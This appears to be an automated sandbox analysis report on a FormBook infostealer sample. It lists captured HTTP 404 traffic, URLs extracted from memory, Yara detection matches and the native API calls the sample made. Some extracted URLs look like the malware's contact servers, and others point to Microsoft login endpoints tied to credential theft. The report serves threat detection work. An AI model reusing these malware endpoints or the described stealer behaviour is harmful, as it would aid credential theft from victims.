Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:42:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JePrF%2Bi68Rhgjh%2F9wuhTbLw6EKwBkWXcd3r%2FZ9AFvcTcFmDKzR15juXip8iLGXnCpv6gr%2FN6dB7LwP2fyTTIhj2z0mV8bPUcpbwUoWqBLCQKNAEQJRCnx7lpqmzfvggTn7k%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffdc7386eda4363-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1653&rtt_var=826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=767&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:42:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4rXlwdQ%2Fuu%2BFhpHWNz6bcSfJx1zIMr8eC0G2k8i%2FTYhSn29LNDg5ov%2Fyr9eX1v6QMBQOSqQAQm6Zv%2BwcekfONXpkvaktLIFYTTynPSRwoi3dbySzd4TcKmL704OKw296A14%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffdc748ccc442c0-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4112&min_rtt=4112&rtt_var=2056&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1784&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:42:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WM%2FzxKLKz7ZsEziDj9viEo15QHYQeD7E1lwJQEueRwfpOytUhNlonOe0vaG6WDwqEsXnjgas%2F%2FHIDAjlvvfDaTyu7XPrkAHt659BXRGRgNKuCgTuyUYQmi%2F7vzqtav2GytU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffdc75848534363-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1550&min_rtt=1550&rtt_var=775&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=500&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:42:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:42:52 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:42:55 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:42:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:43:03 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p mod_fcgid/2.3.9aContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:43:06 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p mod_fcgid/2.3.9aContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:43:08 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p mod_fcgid/2.3.9aContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:43:11 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p mod_fcgid/2.3.9aContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Source: zE1VxVoZ3W.exe, 00000000.00000002.1626172856.0000000003411000.00000004.00000800.00020000.00000000.sdmp, ydRhqlPsLsIczR.exe, 0000000A.00000002.1867592446.0000000002944000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: IBBkYiJCUMDfM.exe, 00000016.00000002.4059491839.00000000022F3000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.absseguridad.online
Source: IBBkYiJCUMDfM.exe, 00000016.00000002.4059491839.00000000022F3000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.absseguridad.online/vekd/
Source: winver.exe, 00000015.00000003.2185479046.0000000007C98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: winver.exe, 00000015.00000003.2185479046.0000000007C98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: winver.exe, 00000015.00000003.2185479046.0000000007C98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: winver.exe, 00000015.00000003.2185479046.0000000007C98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: winver.exe, 00000015.00000002.4062272338.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000016.00000002.4060522658.0000000003702000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.ht
Source: winver.exe, 00000015.00000003.2185479046.0000000007C98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: winver.exe, 00000015.00000003.2185479046.0000000007C98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: winver.exe, 00000015.00000003.2185479046.0000000007C98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: winver.exe, 00000015.00000002.4058013671.0000000002AF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: winver.exe, 00000015.00000002.4058013671.0000000002AF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: winver.exe, 00000015.00000003.2180770459.0000000007BCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: winver.exe, 00000015.00000002.4058013671.0000000002AF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: winver.exe, 00000015.00000002.4058013671.0000000002AF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033-
Source: winver.exe, 00000015.00000002.4058013671.0000000002AF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: winver.exe, 00000015.00000002.4058013671.0000000002AF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: winver.exe, 00000015.00000003.2185479046.0000000007C98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: winver.exe, 00000015.00000003.2185479046.0000000007C98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: winver.exe, 00000015.00000002.4062272338.00000000059BE000.00000004.10000000.00040000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000016.00000002.4060522658.00000000033DE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.zizjwk.asia/s53m/?LH1t=LwZwQ/kCeukPoeELj8mhDOmmdBAOCBBa8wAeryDM2559JbEieA033ASYcolgYYbe9

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 9.2.zE1VxVoZ3W.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.zE1VxVoZ3W.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1996556197.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.4059491839.00000000022A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4059783841.0000000004580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4057661032.0000000002710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1993276336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1997237441.00000000028D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4059982269.0000000004620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0042CAE3 NtClose,	9_2_0042CAE3
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010935C0 NtCreateMutant,LdrInitializeThunk,	9_2_010935C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092B60 NtClose,LdrInitializeThunk,	9_2_01092B60
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_01092DF0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_01092C70
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01093010 NtOpenDirectoryObject,	9_2_01093010
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01093090 NtSetValueKey,	9_2_01093090
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01094340 NtSetContextThread,	9_2_01094340
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01094650 NtSuspendThread,	9_2_01094650
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010939B0 NtGetContextThread,	9_2_010939B0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092B80 NtQueryInformationFile,	9_2_01092B80
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092BA0 NtEnumerateValueKey,	9_2_01092BA0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092BE0 NtQueryValueKey,	9_2_01092BE0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092BF0 NtAllocateVirtualMemory,	9_2_01092BF0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092AB0 NtWaitForSingleObject,	9_2_01092AB0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092AD0 NtReadFile,	9_2_01092AD0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092AF0 NtWriteFile,	9_2_01092AF0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092D00 NtSetInformationFile,	9_2_01092D00
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092D10 NtMapViewOfSection,	9_2_01092D10
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01093D10 NtOpenProcessToken,	9_2_01093D10
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092D30 NtUnmapViewOfSection,	9_2_01092D30
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01093D70 NtOpenThread,	9_2_01093D70
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092DB0 NtEnumerateKey,	9_2_01092DB0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092DD0 NtDelayExecution,	9_2_01092DD0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092C00 NtQueryInformationProcess,	9_2_01092C00
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092C60 NtCreateKey,	9_2_01092C60
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01092CA0 NtQueryInformationToken,	9_2_01092CA0
